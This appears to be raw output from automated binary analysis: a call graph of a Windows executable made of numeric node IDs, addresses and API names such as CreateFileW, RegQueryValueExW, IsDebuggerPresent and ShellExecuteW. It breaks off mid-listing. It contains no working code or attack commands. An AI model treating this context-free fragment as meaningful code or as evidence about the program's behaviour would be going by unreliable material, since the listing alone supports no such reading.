8 API calls 97467->97471 97470 1e2b20 207 API calls 97468->97470 97487 1e049d messages 97468->97487 97493 1e0376 messages 97470->97493 97471->97463 97472 22632b 97499 243fe1 81 API calls __wsopen_s 97472->97499 97473 1e1e50 40 API calls 97473->97493 97474 1e1695 97480 1dbed9 8 API calls 97474->97480 97474->97487 97475 1f014b 8 API calls 97475->97493 97477 1dbed9 8 API calls 97477->97493 97478 225cdb 97484 1dbed9 8 API calls 97478->97484 97478->97487 97479 22625a 97498 243fe1 81 API calls __wsopen_s 97479->97498 97480->97487 97483 1e1990 207 API calls 97483->97493 97484->97487 97485 1f05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97485->97493 97486 1dbf73 8 API calls 97486->97493 97488 1f0413 29 API calls pre_c_initialization 97488->97493 97489 226115 97496 243fe1 81 API calls __wsopen_s 97489->97496 97490 1e0aae messages 97497 243fe1 81 API calls __wsopen_s 97490->97497 97492 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97492->97493 97493->97472 97493->97473 97493->97474 97493->97475 97493->97477 97493->97478 97493->97479 97493->97483 97493->97485 97493->97486 97493->97487 97493->97488 97493->97489 97493->97490 97493->97492 97494->97463 97495->97487 97496->97490 97497->97487 97498->97487 97499->97487 96973 1e235c 96980 1e2365 __fread_nolock 96973->96980 96974 1d8ec0 52 API calls 96974->96980 96975 1e1ff7 __fread_nolock 96976 2274e3 96985 2313c8 8 API calls __fread_nolock 96976->96985 96978 2274ef 96978->96975 96983 1dbed9 8 API calls 96978->96983 96979 1e23b6 96982 1d7d74 8 API calls 96979->96982 96980->96974 96980->96975 96980->96976 96980->96979 96981 1f014b 8 API calls 96980->96981 96984 1f017b 8 API calls 96980->96984 96981->96980 96982->96975 96983->96975 96984->96980 96985->96978 97500 208782 97505 20853e 97500->97505 97503 2087aa 97506 20856f try_get_first_available_module 97505->97506 97516 2086b8 97506->97516 97520 1f917b 40 API calls 2 library calls 97506->97520 97508 20876e 97524 202b5c 26 API calls pre_c_initialization 97508->97524 97510 2086c3 97510->97503 97517 210d04 97510->97517 97512 20870c 97512->97516 97521 1f917b 40 API calls 2 library calls 97512->97521 97514 20872b 97514->97516 97522 1f917b 40 API calls 2 library calls 97514->97522 97516->97510 97523 1ff649 20 API calls __dosmaperr 97516->97523 97525 210401 97517->97525 97519 210d1f 97519->97503 97520->97512 97521->97514 97522->97516 97523->97508 97524->97510 97528 21040d ___BuildCatchObject 97525->97528 97526 21041b 97583 1ff649 20 API calls __dosmaperr 97526->97583 97528->97526 97530 210454 97528->97530 97529 210420 97584 202b5c 26 API calls pre_c_initialization 97529->97584 97536 2109db 97530->97536 97535 21042a __wsopen_s 97535->97519 97586 2107af 97536->97586 97539 210a26 97604 205594 97539->97604 97540 210a0d 97618 1ff636 20 API calls __dosmaperr 97540->97618 97543 210a12 97619 1ff649 20 API calls __dosmaperr 97543->97619 97544 210a2b 97545 210a34 97544->97545 97546 210a4b 97544->97546 97620 1ff636 20 API calls __dosmaperr 97545->97620 97617 21071a CreateFileW 97546->97617 97550 210a39 97621 1ff649 20 API calls __dosmaperr 97550->97621 97552 210b01 GetFileType 97553 210b53 97552->97553 97554 210b0c GetLastError 97552->97554 97626 2054dd 21 API calls 2 library calls 97553->97626 97624 1ff613 20 API calls __dosmaperr 97554->97624 97555 210ad6 GetLastError 97623 1ff613 20 API calls __dosmaperr 97555->97623 97557 210a84 97557->97552 97557->97555 97622 21071a CreateFileW 97557->97622 97559 210b1a CloseHandle 97559->97543 97561 210b43 97559->97561 97625 1ff649 20 API calls __dosmaperr 97561->97625 97563 210ac9 97563->97552 97563->97555 97565 210b74 97567 210bc0 97565->97567 97627 21092b 72 API calls 3 library calls 97565->97627 97566 210b48 97566->97543 97571 210bed 97567->97571 97628 2104cd 72 API calls 3 library calls 97567->97628 97570 210be6 97570->97571 97572 210bfe 97570->97572 97629 208a2e 97571->97629 97574 210478 97572->97574 97575 210c7c CloseHandle 97572->97575 97585 2104a1 LeaveCriticalSection __wsopen_s 97574->97585 97644 21071a CreateFileW 97575->97644 97577 210ca7 97578 210cb1 GetLastError 97577->97578 97579 210cdd 97577->97579 97645 1ff613 20 API calls __dosmaperr 97578->97645 97579->97574 97581 210cbd 97646 2056a6 21 API calls 2 library calls 97581->97646 97583->97529 97584->97535 97585->97535 97587 2107d0 97586->97587 97588 2107ea 97586->97588 97587->97588 97654 1ff649 20 API calls __dosmaperr 97587->97654 97647 21073f 97588->97647 97590 210822 97594 210851 97590->97594 97656 1ff649 20 API calls __dosmaperr 97590->97656 97592 2107df 97655 202b5c 26 API calls pre_c_initialization 97592->97655 97601 2108a4 97594->97601 97658 1fda7d 26 API calls 2 library calls 97594->97658 97597 21089f 97599 21091e 97597->97599 97597->97601 97598 210846 97657 202b5c 26 API calls pre_c_initialization 97598->97657 97659 202b6c 11 API calls _abort 97599->97659 97601->97539 97601->97540 97603 21092a 97605 2055a0 ___BuildCatchObject 97604->97605 97662 2032d1 EnterCriticalSection 97605->97662 97607 2055a7 97608 2055cc 97607->97608 97612 20563a EnterCriticalSection 97607->97612 97615 2055ee 97607->97615 97666 205373 97608->97666 97611 205617 __wsopen_s 97611->97544 97614 205647 LeaveCriticalSection 97612->97614 97612->97615 97614->97607 97663 20569d 97615->97663 97617->97557 97618->97543 97619->97574 97620->97550 97621->97543 97622->97563 97623->97543 97624->97559 97625->97566 97626->97565 97627->97567 97628->97570 97630 205737 __wsopen_s 26 API calls 97629->97630 97633 208a3e 97630->97633 97631 208a44 97685 2056a6 21 API calls 2 library calls 97631->97685 97633->97631 97635 205737 __wsopen_s 26 API calls 97633->97635 97643 208a76 97633->97643 97634 208a9c 97637 208abe 97634->97637 97686 1ff613 20 API calls __dosmaperr 97634->97686 97638 208a6d 97635->97638 97636 205737 __wsopen_s 26 API calls 97639 208a82 CloseHandle 97636->97639 97637->97574 97641 205737 __wsopen_s 26 API calls 97638->97641 97639->97631 97642 208a8e GetLastError 97639->97642 97641->97643 97642->97631 97643->97631 97643->97636 97644->97577 97645->97581 97646->97579 97649 210757 97647->97649 97648 210772 97648->97590 97649->97648 97660 1ff649 20 API calls __dosmaperr 97649->97660 97651 210796 97661 202b5c 26 API calls pre_c_initialization 97651->97661 97653 2107a1 97653->97590 97654->97592 97655->97588 97656->97598 97657->97594 97658->97597 97659->97603 97660->97651 97661->97653 97662->97607 97674 203319 LeaveCriticalSection 97663->97674 97665 2056a4 97665->97611 97675 204ff0 97666->97675 97668 205385 97672 205392 97668->97672 97682 203778 11 API calls 2 library calls 97668->97682 97669 202d38 _free 20 API calls 97671 2053e4 97669->97671 97671->97615 97673 2054ba EnterCriticalSection 97671->97673 97672->97669 97673->97615 97674->97665 97681 204ffd __dosmaperr 97675->97681 97676 20503d 97684 1ff649 20 API calls __dosmaperr 97676->97684 97677 205028 RtlAllocateHeap 97678 20503b 97677->97678 97677->97681 97678->97668 97681->97676 97681->97677 97683 1f521d 7 API calls 2 library calls 97681->97683 97682->97668 97683->97681 97684->97678 97685->97634 97686->97637 96986 1d1098 96991 1d5fc8 96986->96991 96990 1d10a7 96992 1dbf73 8 API calls 96991->96992 96993 1d5fdf GetVersionExW 96992->96993 96994 1d8577 8 API calls 96993->96994 96995 1d602c 96994->96995 96996 1dadf4 8 API calls 96995->96996 97010 1d6062 96995->97010 96997 1d6056 96996->96997 96999 1d55dc 8 API calls 96997->96999 96998 1d611c GetCurrentProcess IsWow64Process 97000 1d6138 96998->97000 96999->97010 97001 215269 GetSystemInfo 97000->97001 97002 1d6150 LoadLibraryA 97000->97002 97003 1d619d GetSystemInfo 97002->97003 97004 1d6161 GetProcAddress 97002->97004 97007 1d6177 97003->97007 97004->97003 97006 1d6171 GetNativeSystemInfo 97004->97006 97005 215224 97006->97007 97008 1d617b FreeLibrary 97007->97008 97009 1d109d 97007->97009 97008->97009 97011 1f0413 29 API calls __onexit 97009->97011 97010->96998 97010->97005 97011->96990 97012 1d105b 97017 1d52a7 97012->97017 97014 1d106a 97048 1f0413 29 API calls __onexit 97014->97048 97016 1d1074 97018 1d52b7 __wsopen_s 97017->97018 97019 1dbf73 8 API calls 97018->97019 97020 1d536d 97019->97020 97049 1d5594 97020->97049 97022 1d5376 97056 1d5238 97022->97056 97025 1d6b7c 8 API calls 97026 1d538f 97025->97026 97062 1d6a7c 97026->97062 97029 1dbf73 8 API calls 97030 1d53a7 97029->97030 97031 1dbd57 8 API calls 97030->97031 97032 1d53b0 RegOpenKeyExW 97031->97032 97033 214be6 RegQueryValueExW 97032->97033 97037 1d53d2 97032->97037 97034 214c03 97033->97034 97035 214c7c RegCloseKey 97033->97035 97036 1f017b 8 API calls 97034->97036 97035->97037 97047 214c8e _wcslen 97035->97047 97038 214c1c 97036->97038 97037->97014 97039 1d423c 8 API calls 97038->97039 97040 214c27 RegQueryValueExW 97039->97040 97041 214c44 97040->97041 97044 214c5e messages 97040->97044 97042 1d8577 8 API calls 97041->97042 97042->97044 97043 1d655e 8 API calls 97043->97047 97044->97035 97045 1db329 8 API calls 97045->97047 97046 1d6a7c 8 API calls 97046->97047 97047->97037 97047->97043 97047->97045 97047->97046 97048->97016 97050 2122d0 __wsopen_s 97049->97050 97051 1d55a1 GetModuleFileNameW 97050->97051 97052 1db329 8 API calls 97051->97052 97053 1d55c7 97052->97053 97054 1d5851 9 API calls 97053->97054 97055 1d55d1 97054->97055 97055->97022 97057 2122d0 __wsopen_s 97056->97057 97058 1d5245 GetFullPathNameW 97057->97058 97059 1d5267 97058->97059 97060 1d8577 8 API calls 97059->97060 97061 1d5285 97060->97061 97061->97025 97063 1d6a8b 97062->97063 97067 1d6aac __fread_nolock 97062->97067 97065 1f017b 8 API calls 97063->97065 97064 1f014b 8 API calls 97066 1d539e 97064->97066 97065->97067 97066->97029 97067->97064 97687 223c0a 97708 23c819 97687->97708 97689 1defdb 97701 1df450 97689->97701 97690 223c14 97690->97689 97692 23c819 Sleep 97690->97692 97693 223c3f 97690->97693 97714 1eaa65 9 API calls 97690->97714 97692->97690 97694 1db329 8 API calls 97693->97694 97695 223c6f 97694->97695 97696 1dbfa5 39 API calls 97695->97696 97697 223c8b 97696->97697 97715 24446f 8 API calls 97697->97715 97700 1df097 97702 1df46f 97701->97702 97703 1df483 97701->97703 97716 1de960 97702->97716 97748 243fe1 81 API calls __wsopen_s 97703->97748 97705 1df47a 97705->97700 97707 224584 97707->97707 97709 23c83f 97708->97709 97711 23c824 97708->97711 97710 23c86d 97709->97710 97712 23c85b Sleep 97709->97712 97710->97690 97711->97690 97712->97710 97714->97690 97715->97700 97717 1e0340 207 API calls 97716->97717 97721 1de99d 97717->97721 97718 1dea0b messages 97718->97705 97720 1dedd5 97720->97718 97732 1f017b 8 API calls 97720->97732 97721->97718 97721->97720 97722 1deac3 97721->97722 97728 1debb8 97721->97728 97731 1f014b 8 API calls 97721->97731 97734 2231d3 97721->97734 97743 1deb29 __fread_nolock messages 97721->97743 97722->97720 97724 1deace 97722->97724 97723 1decff 97726 2231c4 97723->97726 97727 1ded14 97723->97727 97725 1f014b 8 API calls 97724->97725 97736 1dead5 __fread_nolock 97725->97736 97761 256162 8 API calls 97726->97761 97730 1f014b 8 API calls 97727->97730 97733 1f017b 8 API calls 97728->97733 97740 1deb6a 97730->97740 97731->97721 97732->97736 97733->97743 97762 243fe1 81 API calls __wsopen_s 97734->97762 97735 1f014b 8 API calls 97737 1deaf6 97735->97737 97736->97735 97736->97737 97737->97743 97749 1dd260 97737->97749 97739 2231b3 97760 243fe1 81 API calls __wsopen_s 97739->97760 97740->97705 97743->97723 97743->97739 97743->97740 97744 22318e 97743->97744 97746 22316c 97743->97746 97757 1d44fe 207 API calls 97743->97757 97759 243fe1 81 API calls __wsopen_s 97744->97759 97758 243fe1 81 API calls __wsopen_s 97746->97758 97748->97707 97750 1dd29a 97749->97750 97751 1dd2c6 97749->97751 97763 1df6d0 97750->97763 97753 1e0340 207 API calls 97751->97753 97754 22184b 97753->97754 97755 1dd2a0 97754->97755 97786 243fe1 81 API calls __wsopen_s 97754->97786 97755->97743 97757->97743 97758->97740 97759->97740 97760->97740 97761->97734 97762->97718 97764 1df710 97763->97764 97781 1df7dc messages 97764->97781 97788 1f05b2 5 API calls __Init_thread_wait 97764->97788 97767 2245d9 97769 1dbf73 8 API calls 97767->97769 97767->97781 97768 1dbf73 8 API calls 97768->97781 97772 2245f3 97769->97772 97770 1dbe2d 39 API calls 97770->97781 97789 1f0413 29 API calls __onexit 97772->97789 97774 2245fd 97790 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97774->97790 97778 1dbed9 8 API calls 97778->97781 97779 1e1ca0 8 API calls 97779->97781 97780 1e0340 207 API calls 97780->97781 97781->97768 97781->97770 97781->97778 97781->97779 97781->97780 97782 243fe1 81 API calls 97781->97782 97783 1dfae1 97781->97783 97787 1eb35c 207 API calls 97781->97787 97791 1f05b2 5 API calls __Init_thread_wait 97781->97791 97792 1f0413 29 API calls __onexit 97781->97792 97793 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97781->97793 97794 255231 101 API calls 97781->97794 97795 25731e 207 API calls 97781->97795 97782->97781 97783->97755 97786->97755 97787->97781 97788->97767 97789->97774 97790->97781 97791->97781 97792->97781 97793->97781 97794->97781 97795->97781 97796 1d36f5 97799 1d370f 97796->97799 97800 1d3726 97799->97800 97801 1d372b 97800->97801 97802 1d378a 97800->97802 97840 1d3788 97800->97840 97806 1d3738 97801->97806 97807 1d3804 PostQuitMessage 97801->97807 97804 213df4 97802->97804 97805 1d3790 97802->97805 97803 1d376f DefWindowProcW 97828 1d3709 97803->97828 97854 1d2f92 10 API calls 97804->97854 97808 1d37bc SetTimer RegisterWindowMessageW 97805->97808 97809 1d3797 97805->97809 97810 213e61 97806->97810 97811 1d3743 97806->97811 97807->97828 97816 1d37e5 CreatePopupMenu 97808->97816 97808->97828 97814 213d95 97809->97814 97815 1d37a0 KillTimer 97809->97815 97857 23c8f7 65 API calls ___scrt_fastfail 97810->97857 97817 1d374d 97811->97817 97818 1d380e 97811->97818 97813 213e15 97855 1ef23c 40 API calls 97813->97855 97823 213dd0 MoveWindow 97814->97823 97824 213d9a 97814->97824 97825 1d3907 Shell_NotifyIconW 97815->97825 97816->97828 97826 1d3758 97817->97826 97832 213e46 97817->97832 97844 1efcad 97818->97844 97820 213e73 97820->97803 97820->97828 97823->97828 97829 213da0 97824->97829 97830 213dbf SetFocus 97824->97830 97831 1d37b3 97825->97831 97827 1d37f2 97826->97827 97834 1d3763 97826->97834 97852 1d381f 75 API calls ___scrt_fastfail 97827->97852 97829->97834 97835 213da9 97829->97835 97830->97828 97851 1d59ff DeleteObject DestroyWindow 97831->97851 97832->97803 97856 231423 8 API calls 97832->97856 97834->97803 97841 1d3907 Shell_NotifyIconW 97834->97841 97853 1d2f92 10 API calls 97835->97853 97838 1d3802 97838->97828 97840->97803 97842 213e3a 97841->97842 97843 1d396b 60 API calls 97842->97843 97843->97840 97845 1efd4b 97844->97845 97846 1efcc5 ___scrt_fastfail 97844->97846 97845->97828 97847 1d61a9 55 API calls 97846->97847 97849 1efcec 97847->97849 97848 1efd34 KillTimer SetTimer 97848->97845 97849->97848 97850 22fe2b Shell_NotifyIconW 97849->97850 97850->97848 97851->97828 97852->97838 97853->97828 97854->97813 97855->97834 97856->97840 97857->97820 97858 2217c8 97859 2217df 97858->97859 97861 1dd2a0 97859->97861 97862 243fe1 81 API calls __wsopen_s 97859->97862 97861->97861 97862->97861 97863 1d1033 97868 1d68b4 97863->97868 97867 1d1042 97869 1dbf73 8 API calls 97868->97869 97870 1d6922 97869->97870 97876 1d589f 97870->97876 97873 1d69bf 97874 1d1038 97873->97874 97879 1d6b14 8 API calls __fread_nolock 97873->97879 97875 1f0413 29 API calls __onexit 97874->97875 97875->97867 97880 1d58cb 97876->97880 97879->97873 97881 1d58be 97880->97881 97882 1d58d8 97880->97882 97881->97873 97882->97881 97883 1d58df RegOpenKeyExW 97882->97883 97883->97881 97884 1d58f9 RegQueryValueExW 97883->97884 97885 1d592f RegCloseKey 97884->97885 97886 1d591a 97884->97886 97885->97881 97886->97885 97887 1ff06e 97888 1ff07a ___BuildCatchObject 97887->97888 97889 1ff09b 97888->97889 97890 1ff086 97888->97890 97900 1f94fd EnterCriticalSection 97889->97900 97906 1ff649 20 API calls __dosmaperr 97890->97906 97893 1ff08b 97907 202b5c 26 API calls pre_c_initialization 97893->97907 97894 1ff0a7 97901 1ff0db 97894->97901 97899 1ff096 __wsopen_s 97900->97894 97909 1ff106 97901->97909 97903 1ff0e8 97904 1ff0b4 97903->97904 97929 1ff649 20 API calls __dosmaperr 97903->97929 97908 1ff0d1 LeaveCriticalSection __fread_nolock 97904->97908 97906->97893 97907->97899 97908->97899 97910 1ff12e 97909->97910 97911 1ff114 97909->97911 97913 1fdcc5 __fread_nolock 26 API calls 97910->97913 97933 1ff649 20 API calls __dosmaperr 97911->97933 97915 1ff137 97913->97915 97914 1ff119 97934 202b5c 26 API calls pre_c_initialization 97914->97934 97930 209789 97915->97930 97919 1ff23b 97920 1ff248 97919->97920 97925 1ff1ee 97919->97925 97936 1ff649 20 API calls __dosmaperr 97920->97936 97921 1ff1bf 97923 1ff1dc 97921->97923 97921->97925 97935 1ff41f 31 API calls 4 library calls 97923->97935 97928 1ff124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 97925->97928 97937 1ff29b 30 API calls 2 library calls 97925->97937 97926 1ff1e6 97926->97928 97928->97903 97929->97904 97938 209606 97930->97938 97932 1ff153 97932->97919 97932->97921 97932->97928 97933->97914 97934->97928 97935->97926 97936->97928 97937->97928 97939 209612 ___BuildCatchObject 97938->97939 97940 209632 97939->97940 97941 20961a 97939->97941 97943 2096e6 97940->97943 97948 20966a 97940->97948 97964 1ff636 20 API calls __dosmaperr 97941->97964 97969 1ff636 20 API calls __dosmaperr 97943->97969 97944 20961f 97965 1ff649 20 API calls __dosmaperr 97944->97965 97947 2096eb 97970 1ff649 20 API calls __dosmaperr 97947->97970 97963 2054ba EnterCriticalSection 97948->97963 97951 2096f3 97971 202b5c 26 API calls pre_c_initialization 97951->97971 97952 209670 97954 209694 97952->97954 97955 2096a9 97952->97955 97966 1ff649 20 API calls __dosmaperr 97954->97966 97957 20970b __wsopen_s 28 API calls 97955->97957 97956 209627 __wsopen_s 97956->97932 97960 2096a4 97957->97960 97959 209699 97967 1ff636 20 API calls __dosmaperr 97959->97967 97968 2096de LeaveCriticalSection __wsopen_s 97960->97968 97963->97952 97964->97944 97965->97956 97966->97959 97967->97960 97968->97956 97969->97947 97970->97951 97971->97956 97972 225650 97981 1ee3d5 97972->97981 97974 225666 97976 2256e1 97974->97976 97990 1eaa65 9 API calls 97974->97990 97979 2261d7 97976->97979 97992 243fe1 81 API calls __wsopen_s 97976->97992 97978 2256c1 97978->97976 97991 24247e 8 API calls 97978->97991 97982 1ee3f6 97981->97982 97983 1ee3e3 97981->97983 97985 1ee3fb 97982->97985 97986 1ee429 97982->97986 97993 1db4c8 8 API calls 97983->97993 97987 1f014b 8 API calls 97985->97987 97994 1db4c8 8 API calls 97986->97994 97989 1ee3ed 97987->97989 97989->97974 97990->97978 97991->97976 97992->97979 97993->97989 97994->97989 97995 1f076b 97996 1f0777 ___BuildCatchObject 97995->97996 98025 1f0221 97996->98025 97998 1f077e 97999 1f08d1 97998->97999 98003 1f07a8 97998->98003 98063 1f0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97999->98063 98001 1f08d8 98064 1f51c2 28 API calls _abort 98001->98064 98004 1f07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98003->98004 98036 2027ed 98003->98036 98012 1f0848 98004->98012 98059 1f518a 38 API calls 3 library calls 98004->98059 98005 1f08de 98065 1f5174 28 API calls _abort 98005->98065 98009 1f08e6 98010 1f07c7 98044 1f0cc9 98012->98044 98014 1f084e 98048 1d331b 98014->98048 98019 1f086a 98019->98001 98020 1f086e 98019->98020 98021 1f0877 98020->98021 98061 1f5165 28 API calls _abort 98020->98061 98062 1f03b0 13 API calls 2 library calls 98021->98062 98024 1f087f 98024->98010 98026 1f022a 98025->98026 98066 1f0a08 IsProcessorFeaturePresent 98026->98066 98028 1f0236 98067 1f3004 10 API calls 3 library calls 98028->98067 98030 1f023b 98031 1f023f 98030->98031 98068 202687 98030->98068 98031->97998 98034 1f0256 98034->97998 98037 202804 98036->98037 98038 1f0dfc CatchGuardHandler 5 API calls 98037->98038 98039 1f07c1 98038->98039 98039->98010 98040 202791 98039->98040 98041 2027c0 98040->98041 98042 1f0dfc CatchGuardHandler 5 API calls 98041->98042 98043 2027e9 98042->98043 98043->98004 98119 1f26b0 98044->98119 98047 1f0cef 98047->98014 98049 1d3327 IsThemeActive 98048->98049 98050 1d3382 98048->98050 98121 1f52b3 98049->98121 98060 1f0d02 GetModuleHandleW 98050->98060 98052 1d3352 98127 1f5319 98052->98127 98054 1d3359 98134 1d32e6 SystemParametersInfoW SystemParametersInfoW 98054->98134 98056 1d3360 98135 1d338b 98056->98135 98058 1d3368 SystemParametersInfoW 98058->98050 98059->98012 98060->98019 98061->98021 98062->98024 98063->98001 98064->98005 98065->98009 98066->98028 98067->98030 98072 20d576 98068->98072 98071 1f302d 8 API calls 3 library calls 98071->98031 98075 20d593 98072->98075 98076 20d58f 98072->98076 98074 1f0248 98074->98034 98074->98071 98075->98076 98078 204f6e 98075->98078 98090 1f0dfc 98076->98090 98079 204f7a ___BuildCatchObject 98078->98079 98097 2032d1 EnterCriticalSection 98079->98097 98081 204f81 98098 205422 98081->98098 98083 204f90 98084 204f9f 98083->98084 98111 204e02 29 API calls 98083->98111 98113 204fbb LeaveCriticalSection _abort 98084->98113 98087 204f9a 98112 204eb8 GetStdHandle GetFileType 98087->98112 98088 204fb0 __wsopen_s 98088->98075 98091 1f0e07 IsProcessorFeaturePresent 98090->98091 98092 1f0e05 98090->98092 98094 1f0fce 98091->98094 98092->98074 98118 1f0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98094->98118 98096 1f10b1 98096->98074 98097->98081 98099 20542e ___BuildCatchObject 98098->98099 98100 205452 98099->98100 98101 20543b 98099->98101 98114 2032d1 EnterCriticalSection 98100->98114 98115 1ff649 20 API calls __dosmaperr 98101->98115 98104 205440 98116 202b5c 26 API calls pre_c_initialization 98104->98116 98106 20544a __wsopen_s 98106->98083 98107 20548a 98117 2054b1 LeaveCriticalSection _abort 98107->98117 98109 20545e 98109->98107 98110 205373 __wsopen_s 21 API calls 98109->98110 98110->98109 98111->98087 98112->98084 98113->98088 98114->98109 98115->98104 98116->98106 98117->98106 98118->98096 98120 1f0cdc GetStartupInfoW 98119->98120 98120->98047 98122 1f52bf ___BuildCatchObject 98121->98122 98184 2032d1 EnterCriticalSection 98122->98184 98124 1f52ca pre_c_initialization 98185 1f530a 98124->98185 98126 1f52ff __wsopen_s 98126->98052 98128 1f533f 98127->98128 98129 1f5325 98127->98129 98128->98054 98129->98128 98189 1ff649 20 API calls __dosmaperr 98129->98189 98131 1f532f 98190 202b5c 26 API calls pre_c_initialization 98131->98190 98133 1f533a 98133->98054 98134->98056 98136 1d339b __wsopen_s 98135->98136 98137 1dbf73 8 API calls 98136->98137 98138 1d33a7 GetCurrentDirectoryW 98137->98138 98191 1d4fd9 98138->98191 98140 1d33ce IsDebuggerPresent 98141 1d33dc 98140->98141 98142 213ca3 MessageBoxA 98140->98142 98143 213cbb 98141->98143 98144 1d33f0 98141->98144 98142->98143 98295 1d4176 8 API calls 98143->98295 98259 1d3a95 98144->98259 98149 1d3462 98153 213cec SetCurrentDirectoryW 98149->98153 98154 1d346a 98149->98154 98153->98154 98155 1d3475 98154->98155 98296 231fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 98154->98296 98291 1d34d3 7 API calls 98155->98291 98159 213d07 98159->98155 98161 213d19 98159->98161 98163 1d5594 10 API calls 98161->98163 98162 1d347f 98165 1d396b 60 API calls 98162->98165 98169 1d3494 98162->98169 98164 213d22 98163->98164 98166 1db329 8 API calls 98164->98166 98165->98169 98167 213d30 98166->98167 98170 213d38 98167->98170 98171 213d5f 98167->98171 98168 1d34af 98175 1d34b6 SetCurrentDirectoryW 98168->98175 98169->98168 98172 1d3907 Shell_NotifyIconW 98169->98172 98173 1d6b7c 8 API calls 98170->98173 98174 1d6b7c 8 API calls 98171->98174 98172->98168 98176 213d43 98173->98176 98177 213d5b GetForegroundWindow ShellExecuteW 98174->98177 98178 1d34ca 98175->98178 98180 1d7bb5 8 API calls 98176->98180 98181 213d90 98177->98181 98178->98058 98182 213d51 98180->98182 98181->98168 98183 1d6b7c 8 API calls 98182->98183 98183->98177 98184->98124 98188 203319 LeaveCriticalSection 98185->98188 98187 1f5311 98187->98126 98188->98187 98189->98131 98190->98133 98192 1dbf73 8 API calls 98191->98192 98193 1d4fef 98192->98193 98297 1d63d7 98193->98297 98195 1d500d 98196 1dbd57 8 API calls 98195->98196 98197 1d5021 98196->98197 98198 1dbed9 8 API calls 98197->98198 98199 1d502c 98198->98199 98311 1d893c 98199->98311 98202 1db329 8 API calls 98203 1d5045 98202->98203 98204 1dbe2d 39 API calls 98203->98204 98205 1d5055 98204->98205 98206 1db329 8 API calls 98205->98206 98207 1d507b 98206->98207 98208 1dbe2d 39 API calls 98207->98208 98209 1d508a 98208->98209 98210 1dbf73 8 API calls 98209->98210 98211 1d50a8 98210->98211 98314 1d51ca 98211->98314 98214 1f4d98 40 API calls 98215 1d50c2 98214->98215 98216 1d50cc 98215->98216 98217 214b23 98215->98217 98218 1f4d98 40 API calls 98216->98218 98219 1d51ca 8 API calls 98217->98219 98220 1d50d7 98218->98220 98221 214b37 98219->98221 98220->98221 98222 1d50e1 98220->98222 98223 1d51ca 8 API calls 98221->98223 98224 1f4d98 40 API calls 98222->98224 98225 214b53 98223->98225 98226 1d50ec 98224->98226 98228 1d5594 10 API calls 98225->98228 98226->98225 98227 1d50f6 98226->98227 98229 1f4d98 40 API calls 98227->98229 98230 214b76 98228->98230 98231 1d5101 98229->98231 98232 1d51ca 8 API calls 98230->98232 98233 214b9f 98231->98233 98234 1d510b 98231->98234 98235 214b82 98232->98235 98237 1d51ca 8 API calls 98233->98237 98236 1d512e 98234->98236 98240 1dbed9 8 API calls 98234->98240 98239 1dbed9 8 API calls 98235->98239 98238 214bda 98236->98238 98243 1d7e12 8 API calls 98236->98243 98241 214bbd 98237->98241 98244 214b90 98239->98244 98245 1d5121 98240->98245 98242 1dbed9 8 API calls 98241->98242 98247 214bcb 98242->98247 98248 1d513e 98243->98248 98249 1d51ca 8 API calls 98244->98249 98246 1d51ca 8 API calls 98245->98246 98246->98236 98250 1d51ca 8 API calls 98247->98250 98251 1d8470 8 API calls 98248->98251 98249->98233 98250->98238 98252 1d514c 98251->98252 98320 1d8a60 98252->98320 98254 1d893c 8 API calls 98256 1d5167 98254->98256 98255 1d8a60 8 API calls 98255->98256 98256->98254 98256->98255 98257 1d51ab 98256->98257 98258 1d51ca 8 API calls 98256->98258 98257->98140 98258->98256 98260 1d3aa2 __wsopen_s 98259->98260 98261 1d3abb 98260->98261 98262 2140da ___scrt_fastfail 98260->98262 98263 1d5851 9 API calls 98261->98263 98265 2140f6 GetOpenFileNameW 98262->98265 98264 1d3ac4 98263->98264 98333 1d3a57 98264->98333 98267 214145 98265->98267 98269 1d8577 8 API calls 98267->98269 98271 21415a 98269->98271 98271->98271 98272 1d3ad9 98351 1d62d5 98272->98351 98892 1d3624 7 API calls 98291->98892 98293 1d347a 98294 1d35b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98293->98294 98294->98162 98295->98149 98296->98159 98298 1d63e4 __wsopen_s 98297->98298 98299 1d8577 8 API calls 98298->98299 98300 1d6416 98298->98300 98299->98300 98301 1d655e 8 API calls 98300->98301 98310 1d644c 98300->98310 98301->98300 98302 1d655e 8 API calls 98302->98310 98303 1db329 8 API calls 98304 1d6543 98303->98304 98306 1d6a7c 8 API calls 98304->98306 98305 1db329 8 API calls 98305->98310 98307 1d654f 98306->98307 98307->98195 98308 1d6a7c 8 API calls 98308->98310 98309 1d651a 98309->98303 98309->98307 98310->98302 98310->98305 98310->98308 98310->98309 98312 1f014b 8 API calls 98311->98312 98313 1d5038 98312->98313 98313->98202 98315 1d51d4 98314->98315 98316 1d51f2 98314->98316 98317 1d50b4 98315->98317 98319 1dbed9 8 API calls 98315->98319 98318 1d8577 8 API calls 98316->98318 98317->98214 98318->98317 98319->98317 98321 1d8a76 98320->98321 98322 216737 98321->98322 98327 1d8a80 98321->98327 98331 1eb7a2 8 API calls 98322->98331 98323 216744 98332 1db4c8 8 API calls 98323->98332 98326 216762 98326->98326 98327->98323 98328 1d8b94 98327->98328 98330 1d8b9b 98327->98330 98329 1f014b 8 API calls 98328->98329 98329->98330 98330->98256 98331->98323 98332->98326 98334 2122d0 __wsopen_s 98333->98334 98335 1d3a64 GetLongPathNameW 98334->98335 98336 1d8577 8 API calls 98335->98336 98337 1d3a8c 98336->98337 98338 1d53f2 98337->98338 98339 1dbf73 8 API calls 98338->98339 98340 1d5404 98339->98340 98341 1d5851 9 API calls 98340->98341 98342 1d540f 98341->98342 98343 1d541a 98342->98343 98344 214d5b 98342->98344 98345 1d6a7c 8 API calls 98343->98345 98348 214d7d 98344->98348 98387 1ee36b 41 API calls 98344->98387 98347 1d5426 98345->98347 98381 1d1340 98347->98381 98350 1d5439 98350->98272 98388 1d6679 98351->98388 98354 215336 98513 2436b8 98354->98513 98356 1d6679 93 API calls 